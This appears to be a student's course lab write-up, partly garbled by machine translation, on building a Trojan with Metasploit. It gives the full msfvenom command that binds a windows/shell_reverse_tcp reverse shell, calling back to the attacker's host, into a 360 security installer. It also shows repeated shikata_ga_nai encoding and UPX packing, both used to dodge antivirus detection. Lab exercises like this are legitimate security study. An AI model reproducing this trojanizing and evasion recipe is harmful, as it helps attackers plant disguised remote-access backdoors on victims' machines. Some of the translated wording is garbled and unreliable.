2017-2018-1 20179202 "Linux kernel Fundamentals and Analysis" 11th week assignment

Metasploit Implement Trojan, bundle, no kill 1. Preliminary knowledge

(1) Metasploit

Metasploit is an open source security vulnerability detection Tool, called the Metasploit Framework, or MSF. MSF is a vulnerability framework that allows users to develop their own vulnerability scripts for testing. Architecture for Metasploit:

?????????? Photo Source play Metasploit Series (first episode)

Base library Files :

• Base libraries in Rex:metasploit to support different protocols, transformations, and socket processing
• MSF CORE: The library defines the framework and provides a basic application interface for Metasploit
• MSF Base: This library provides a simplified, user-friendly application interface to the Metasploit framework

Modules (Implementation code through the most core penetration testing capabilities loaded, integrated and externally provided by the Metasploit framework)

• Penetration attack module (exploits): A code component that exploits a discovered security vulnerability or configuration weakness to attack a remote target system to implant and run the attack payload to gain access control over the target system
• Attack load Module (payloads): A piece of implant code that drives the target system to run after a successful penetration attack, usually to open a control session connection on the target system for penetration attackers
• Encoder module (encoders): Ensure that no "bad characters" should be avoided during the attack load and "kill" the attack load
• Post-Infiltration attack module (post-modes): The main support after the penetration attack to obtain the target system remote control, in the controlled system to carry out a variety of post-infiltration attacks, such as access to sensitive information, further including the exhibition, the implementation of a springboard attack, etc.
• Auxiliary Module (auxiliary): A vulnerability attack with no attack load for tasks such as port scanning, fingerprint verification, service scanning, etc.

• (2) Attack load tool

• Msfpayload: Available shell code for production and output of Metasploit all types
• Msfencode: The shell code generated by the MSFPAYLOAD is encoded to allow the shell code to adapt to the target system environment and to better implement its functions

• Msfvenom: A mixture of msfpayload and Msfencode

2. Experiments

(1) Select Attack load

Input msfconsole into the Metasploit console:

Enter show payloads to view all available attack payload information:

In this experiment we used windows/shell_reverse_tcp (a simple Bounce shell program, which is a command line that connects Target drone).

(2) Select Bundle file

You can create your own EXE files, or you can bundle them into other EXE files. This experiment chose bundle, I looked for 360 install software (360.exe)

(3) Avoid killing

Make a kill-free wooden malay bypass antivirus software detection. One way to avoid killing under the Meatsploit framework is to use the MSF encoder. msfvenom -l encodersView the encoding method (not all encodings are available on Windows systems):

The experiment selected x86/shikata_ga_nai :

(4) generation, bundling, kill-free implementation

Lab Environment:

Attack Kali Linux ip:192.168.177.133

Target drone win7 ip:192.168.177.1

Command explanation:

msfvenom -p windows/shell_reverse_tcp 使用shell_reverse_tcp攻击载荷LHOST=192.168.177.133                 设置攻击者IP地址LPORT=8080                          设置攻击者的监听端口，用于接收木马的链接请求-e x86/shikata_ga_nai                 使用shikata_ga_nai的编码方式-x 360.exe                            将木马捆绑在360.exe上-i 5                                  对目标进行5次编码-f exe                                指定MSF编码器输出格式为exe-o /root/backdoor.exe                 指定处理完毕后的文件输出路径

The following test, set up after the link to wait for the Trojan:

On the Win7 to run the production of good backdoor.exe, very sorry to be 360 Avira:

Encode multiple times in different ways:

After the operation is still 360 Avira:

Try shell processing again, input UPX see UPX Shell software parameters. upx -5 backdoor.exeThe Backdoor.exe is added to the shell (compression processing here, the inconvenience of shell is to change the size of the source file, experienced security personnel can easily find this difference):

Embarrassed...... Still be avira, you can see the name of the Trojan has changed:

The experiment encountered another problem is the Kali attack host on their own virtual machine Win7 is able to monitor the link into the Trojan, but then Wang Kali attack my Win7 (the same LAN) is not listening, his computer can ping my computer, but my ping does not pass his, Check that the firewall has been shut down, we suspect that the lab router may have made a security configuration.

Because it is the first contact with the security system and software, so this experiment thanks to Wang classmate's guidance, encountered the problem after careful pondering after the solution.

2017-2018-1 20179202 "Linux kernel Fundamentals and Analysis" 11th week assignment